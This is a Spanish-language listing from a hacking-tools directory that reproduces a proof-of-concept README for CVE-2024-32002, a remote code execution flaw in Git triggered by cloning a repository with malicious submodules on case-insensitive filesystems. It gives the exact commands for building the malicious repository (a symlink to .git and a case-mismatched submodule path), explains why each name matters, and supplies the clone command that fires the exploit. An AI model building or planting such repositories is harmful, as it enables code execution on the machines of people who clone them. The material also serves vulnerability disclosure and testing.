Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubjakob-pennington/cve-2024-32002-poc-rce

cve-2024-32002-poc-rce

Prueba de concepto de exploit para CVE-2024-32002, que demuestra ejecución remota de código a través de submódulos de Git maliciosos en sistemas de archivos que no distinguen entre mayúsculas y minúsculas.

Ver Repositorio
13hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-32002 RCE POC

Un POC para CVE-2024-32002 que demuestra Ejecución Remota de Código (RCE).

Vea cve-2024-32002-poc-rce para el repositorio de submódulos relacionado.

Lo que contiene este repositorio

  • Un enlace simbólico con un nombre arbitrario que enlaza al directorio .git.
  • Un archivo .gitmodules que define el submódulo malicioso.

Cómo recrear este repositorio

Este repositorio se creó en Linux (WSL2, para ser específico). Esto es importante, el repositorio malicioso solo puede crearse en un sistema de archivos que distinga entre mayúsculas y minúsculas.

  1. Cree un enlace simbólico, usando todos los caracteres en minúscula
root@kitploit:~
ln -s .git submodule

Notas:

  • El enlace simbólico debe apuntar a la carpeta .git, ya que ahí es donde queremos escribir archivos
  • El nombre del enlace simbólico (submodule) es arbitrario, pero debe comenzar con un carácter en minúscula
  • Esto es importante, porque los caracteres en minúscula se ordenan antes que los caracteres en mayúscula. Cuando la máquina que clona se confunda sobre dónde escribir los archivos del submódulo, queremos que elija el enlace simbólico y no un directorio normal.
  1. Agregue el submódulo malicioso, notando la diferencia de mayúsculas/minúsculas en el nombre del directorio del submódulo
root@kitploit:~
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce

Notas:

  • El nombre del submódulo ("rce/notexists") es importante, entrará en juego al colocar nuestro hook en el submódulo.
    • "rce" debe coincidir con el último segmento de la ruta del Submódulo.
    • "notexists" debe coincidir con el nombre del directorio que contiene hooks/post-checkout en el directorio del submódulo. Vea cve-2024-32002-poc-rce.
  • La estructura de la ruta del submódulo ("Submodule/modules/rce") también es importante:
    • El primer segmento de la ruta del submódulo ("Submodule") debe coincidir con el nombre del enlace simbólico anterior, solo diferenciándose en mayúsculas/minúsculas.
    • El segundo segmento ("modules") coincide con el nombre de la ruta dentro del directorio .git que rastrea el estado de git para los submódulos.
    • El tercer segmento ("rce") debe coincidir con el primer segmento del nombre del submódulo anterior.

Cómo ejecutar el POC

Esta vulnerabilidad solo afecta a Windows y MacOS porque ambos tienen sistemas de archivos que no distinguen entre mayúsculas y minúsculas.

  1. Verifique si tiene una versión vulnerable de git. Consulte el aviso de GitHub para conocer las versiones afectadas.
root@kitploit:~
git --version
  1. Piense si realmente desea ejecutar un comando que podría lograr RCE... Este repositorio es benigno, pero ¿está seguro?
  2. Ejecute el siguiente comando:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git
  1. Si el POC funcionó, ¡debería poder hacer algunos cálculos!
Descargar herramienta